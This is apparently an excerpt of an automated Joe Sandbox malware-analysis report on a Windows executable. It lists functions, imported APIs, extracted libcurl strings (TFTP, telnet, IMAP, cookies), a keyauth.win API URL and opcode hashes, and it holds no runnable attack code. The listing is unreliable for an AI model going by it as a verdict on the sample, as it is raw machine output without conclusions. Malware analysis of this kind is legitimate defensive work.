                                            • Instruction Fuzzy Hash: D9B1A461B08A8E85EB60AB25D864BB9AB91FF84F98FC44033D94DC7795CF3CD4458722
                                            APIs
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0000000100000000,?,00007FF7E5A2FD2F), ref: 00007FF7E5A3D02D
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0000000100000000,?,00007FF7E5A2FD2F), ref: 00007FF7E5A3D04F
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0000000100000000,?,00007FF7E5A2FD2F), ref: 00007FF7E5A3D060
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0000000100000000,?,00007FF7E5A2FD2F), ref: 00007FF7E5A3D08E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdupmalloc
                                            • String ID: ../$/..$/../$/./
                                            • API String ID: 111713529-456519384
                                            • Opcode ID: 190f5f5efba5df30148cf3e06b309bf7ce750d830b12a83570053c044d9442d2
                                            • Instruction ID: cf66babd495aecdb0786238b30048de952f2fc6385ae89f252ad60adbd3aa63e
                                            • Opcode Fuzzy Hash: 190f5f5efba5df30148cf3e06b309bf7ce750d830b12a83570053c044d9442d2
                                            • Instruction Fuzzy Hash: 3F71A821F0D68AC5FB626B219920B7DEF91AF12FD8F844133CA5D86691DE3CE451C322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdup
                                            • String ID:
                                            • API String ID: 2653869212-0
                                            • Opcode ID: c5af31e6bfdd5c7defb84974b0b43b731949193f68c51d1a7fd0e98afda8c353
                                            • Instruction ID: 3d2945f170a1f46ab78f58ad00f14a3e2a96e273f210b1376a591899c1da3167
                                            • Opcode Fuzzy Hash: c5af31e6bfdd5c7defb84974b0b43b731949193f68c51d1a7fd0e98afda8c353
                                            • Instruction Fuzzy Hash: 38B14F32A09B8A96EA659F15E5607B9B7A0FB44F54F940136CB8E83750DF3CE0748321
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdupmalloctolower
                                            • String ID: %%%02x
                                            • API String ID: 1244608590-4020994737
                                            • Opcode ID: e50ef931bf97fd6978a02dacd3bdcb8e3fa39a162dbfd03a69ca58af84868c80
                                            • Instruction ID: 77f2dcb48c5d3d9a1c699a8fb23bc35c5578c1725e0cf66a1ae93bbab368e4e0
                                            • Opcode Fuzzy Hash: e50ef931bf97fd6978a02dacd3bdcb8e3fa39a162dbfd03a69ca58af84868c80
                                            • Instruction Fuzzy Hash: DCA1B715B0D28A45FB616B219532B79AFD19F06F84FC84073DA8E962C5EE3DE4448733
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcmp
                                            • String ID: $CAPABILITY$EXAMINE$EXPUNGE$FETCH$LIST$LSUB$NOOP$PREA$SEARCH$SELECT$STORE$UID$Unexpected continuation response
                                            • API String ID: 1475443563-555813803
                                            • Opcode ID: 5e11bfa2a84c0bb5aa158c4cf855aa4d81f042b1f6a2de6bc2e49222ceafe7f8
                                            • Instruction ID: 1d25b8eb1eca695f40873441675211fba74282c60f8a568cbc3dd11990c6d9ab
                                            • Opcode Fuzzy Hash: 5e11bfa2a84c0bb5aa158c4cf855aa4d81f042b1f6a2de6bc2e49222ceafe7f8
                                            • Instruction Fuzzy Hash: 8FD15DA1B0C25A51FB247E25C664BB8AF90AF11F94FC45033DA9D8A585EE7CF8418323
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdupmalloc
                                            • String ID:
                                            • API String ID: 111713529-0
                                            • Opcode ID: 65d70c2820eccc7ad6d5e07aa6e6552cb9b250ec8001ae131bdda7340f47216e
                                            • Instruction ID: c8776e6f2d9dcf65bb99674d5a63c98512ca256967d6b46d4a947455d27c532f
                                            • Opcode Fuzzy Hash: 65d70c2820eccc7ad6d5e07aa6e6552cb9b250ec8001ae131bdda7340f47216e
                                            • Instruction Fuzzy Hash: E1617C66B05B4682EA25EF12B564A29B7A4FF48F90B854036CF8E83750EF3CE494C311
                                            APIs
                                              • Part of subcall function 00007FF7E59E4310: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                              • Part of subcall function 00007FF7E59E6310: memcpy.VCRUNTIME140 ref: 00007FF7E59E6486
                                              • Part of subcall function 00007FF7E59E1FB0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2121
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EA851
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59EA87F
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59EA88D
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EA8C7
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EA924
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EA9DD
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59EAA0B
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59EAA19
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EAA53
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EAAA4
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EAAEE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$memcpy
                                            • String ID: value
                                            • API String ID: 3212548336-494360628
                                            • Opcode ID: 318b2423f1fc7c9365d9dea7f80e65f750f29bf68608046753f263769fa03efc
                                            • Instruction ID: 0b2ef09503da027421e28a1091dcd6f40be530f6485046b32247d0a407600746
                                            • Opcode Fuzzy Hash: 318b2423f1fc7c9365d9dea7f80e65f750f29bf68608046753f263769fa03efc
                                            • Instruction Fuzzy Hash: 30A19632B18B4985EB00EB68E4553EDA761FF41BA4F901332DA6D86AE9DF7CD081C711
                                            APIs
                                              • Part of subcall function 00007FF7E59E4310: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                              • Part of subcall function 00007FF7E59E6310: memcpy.VCRUNTIME140 ref: 00007FF7E59E6486
                                              • Part of subcall function 00007FF7E59E1FB0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2121
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EC0E0
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59EC10E
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59EC11C
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EC156
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EC1B3
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EC26C
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59EC29A
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59EC2A8
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EC2E2
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EC333
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59EC37D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$memcpy
                                            • String ID: value
                                            • API String ID: 3212548336-494360628
                                            • Opcode ID: 9efa30662b9e0125733c549c7ddb0404d6325bb906536454243b4d6c7a755523
                                            • Instruction ID: 218b36200ca7b02042600c4f64822db0faa21bd4131772a4de34a4f3c09c1b1e
                                            • Opcode Fuzzy Hash: 9efa30662b9e0125733c549c7ddb0404d6325bb906536454243b4d6c7a755523
                                            • Instruction Fuzzy Hash: 7DA18922B18A4555EB00EBA8E4543EDA761EF45BB4F801332D6AD82AD9DF7CE081C711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: fclosefree$__acrt_iob_func_strdupcallocfopenmalloc
                                            • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                            • API String ID: 4109794434-4095489131
                                            • Opcode ID: 992fbeba35ba7d9cfd174204178d183b8fb1cad6507cabc141d8163f4fd3fce8
                                            • Instruction ID: 58afe89f49b2e8ddd43be40257c86889cc2133854a26278a2d9622c40eb3f16c
                                            • Opcode Fuzzy Hash: 992fbeba35ba7d9cfd174204178d183b8fb1cad6507cabc141d8163f4fd3fce8
                                            • Instruction Fuzzy Hash: AB61E721B0C78A81EA50AB15A5247F9AB94BF46F84FDC4036DE8D8B781DF3DE4518332
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$strrchr$__sys_nerrstrerrorstrncpy
                                            • String ID: Unknown error %d (%#x)
                                            • API String ID: 4262108436-2414550090
                                            • Opcode ID: 7b9888dc63a3e7c9f678162156a496c77b2712124fc0888817af1d5cf78b4351
                                            • Instruction ID: 2349d6b3e5b42b3ff660790b731a8019477e30a3af5a4f75e08cfdc5d9e39a6c
                                            • Opcode Fuzzy Hash: 7b9888dc63a3e7c9f678162156a496c77b2712124fc0888817af1d5cf78b4351
                                            • Instruction Fuzzy Hash: 41316021B0865A86EF156F61A83437DEA92AF84F84F884037D95EC7795DF3CE4118732
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc
                                            • String ID: Issuer: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$Issuer$Subject$TRUE$Version
                                            • API String ID: 2190258309-1457932261
                                            • Opcode ID: d66a8e2a531d88578f19dc84826a95064c5f9f86ba4d3b4d7cb9b6f8f2967699
                                            • Instruction ID: 7645ca0d13b7006f70fad1fec23ca614648c6e52f890df4ee1edba2a20f278eb
                                            • Opcode Fuzzy Hash: d66a8e2a531d88578f19dc84826a95064c5f9f86ba4d3b4d7cb9b6f8f2967699
                                            • Instruction Fuzzy Hash: EF61B222B0978685E711AB61E464BFAAB91BF44B88FC40537CE1E87395EF3CE144C312
                                            APIs
                                            • memset.VCRUNTIME140 ref: 00007FF7E5A29D8B
                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A29EB5
                                              • Part of subcall function 00007FF7E59F5730: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E59FFD30,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E59F1B61), ref: 00007FF7E59F5757
                                              • Part of subcall function 00007FF7E59F5730: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E59FFD30,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E59F1B61), ref: 00007FF7E59F5763
                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A29E6F
                                              • Part of subcall function 00007FF7E59F5690: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E59F56A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freestrncpy$_strdupmemset
                                            • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                            • API String ID: 3826632026-748038847
                                            • Opcode ID: 1fef72c7444546989d73c0875fbfa1f9dd609a4fb55574ababa5f96400690454
                                            • Instruction ID: b6d0988ff9d38718b7edf90f132bd0c8ee71bbd9bc32cf3e96efdd352e9b89fe
                                            • Opcode Fuzzy Hash: 1fef72c7444546989d73c0875fbfa1f9dd609a4fb55574ababa5f96400690454
                                            • Instruction Fuzzy Hash: 2F714E32B0CACA95EB21AF24D461BE9A760FF44B88FC44033DA8C96255DF38D595C762
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$timeout$tsize
                                            • API String ID: 1294909896-3837278924
                                            • Opcode ID: 8bff296f59c387a8d797001e2b4b23bc00947aaa51299eb1c46842c7a3ab6500
                                            • Instruction ID: ab6cd64a05daf383650983da9f6d1235205f78cf20143c0b6d0e8b0a78821735
                                            • Opcode Fuzzy Hash: 8bff296f59c387a8d797001e2b4b23bc00947aaa51299eb1c46842c7a3ab6500
                                            • Instruction Fuzzy Hash: FED18B66B08A8A95EB10DF24D0607B9ABA1EF85F88FC48133DA4D97785DF7CD109C361
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: sendto$ErrorLast
                                            • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                            • API String ID: 4042023021-4197595102
                                            • Opcode ID: 50e73455d7e3a75b11b53e943120c7777fc9fe00b525068e7abcedd1a1672a85
                                            • Instruction ID: b353e848d9291e66f6f08ceb8b6b0d93a736591facee941710166e2b93fe1022
                                            • Opcode Fuzzy Hash: 50e73455d7e3a75b11b53e943120c7777fc9fe00b525068e7abcedd1a1672a85
                                            • Instruction Fuzzy Hash: D8B18C76708686C6EB24AF29D461BA97BA0FF48F88F844032DA4D8B759DF38D441C761
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLastsend
                                            • String ID: #$%127[^,],%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s%c%s$Sending data failed (%d)
                                            • API String ID: 1802528911-931584821
                                            • Opcode ID: 00404623e120793d597db3c352179d0aa63a3864e2c814257e5a1cf65cb6576d
                                            • Instruction ID: d7b0e7fde1705d126c7decf6e5856dfcefd7aa5442c7a53a2fe6eb69c6b60ec8
                                            • Opcode Fuzzy Hash: 00404623e120793d597db3c352179d0aa63a3864e2c814257e5a1cf65cb6576d
                                            • Instruction Fuzzy Hash: 3D91E332608ACA85F721AF64E415BEAA7A0FF44BA8F840232EE4D47B85DF7CD145C751
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: sendto$_time64
                                            • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
                                            • API String ID: 2327272419-1785996722
                                            • Opcode ID: 082182b0c608b5dd753e2c0b4bfb06eb638cf906bf23a4cf43ef42e9b11363e8
                                            • Instruction ID: e061ac82578ab5ccec18508c678d4f7b73f59ad74c7d9d42a136cb15ae549875
                                            • Opcode Fuzzy Hash: 082182b0c608b5dd753e2c0b4bfb06eb638cf906bf23a4cf43ef42e9b11363e8
                                            • Instruction Fuzzy Hash: 50918B36708685C5D721EF29D464BA9BBA0FB88F88F848132DB4D8B758DF39D406C721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup$freestrchrstrncmpstrtol
                                            • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                            • API String ID: 2070079882-2404041592
                                            • Opcode ID: 0d1e06a6d0f9712c3ca27df683fb699d76da4af6e053dfbf71b887b8ca41c8f6
                                            • Instruction ID: 5bd53975340e2a0a3983eaa4a9eded12a728d25e295b51cf146401eb36a07af3
                                            • Opcode Fuzzy Hash: 0d1e06a6d0f9712c3ca27df683fb699d76da4af6e053dfbf71b887b8ca41c8f6
                                            • Instruction Fuzzy Hash: 8451F661B1868F46EB11AB359470B79EFD1AF05F98FC84033DA4D8A281DF3CE4468322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: fclosefree$__acrt_iob_func_strdupcallocfopenmalloc
                                            • String ID: Set-Cookie:$none
                                            • API String ID: 4109794434-3629594122
                                            • Opcode ID: c845ef27a6eb0f70cfb5e5d8d0ec943c7a71320ffd18cdb9581be7247b181f35
                                            • Instruction ID: 2050aaed1fdef1efb15df3f4943c49089ee26db15d06c4a31867119c3bc57811
                                            • Opcode Fuzzy Hash: c845ef27a6eb0f70cfb5e5d8d0ec943c7a71320ffd18cdb9581be7247b181f35
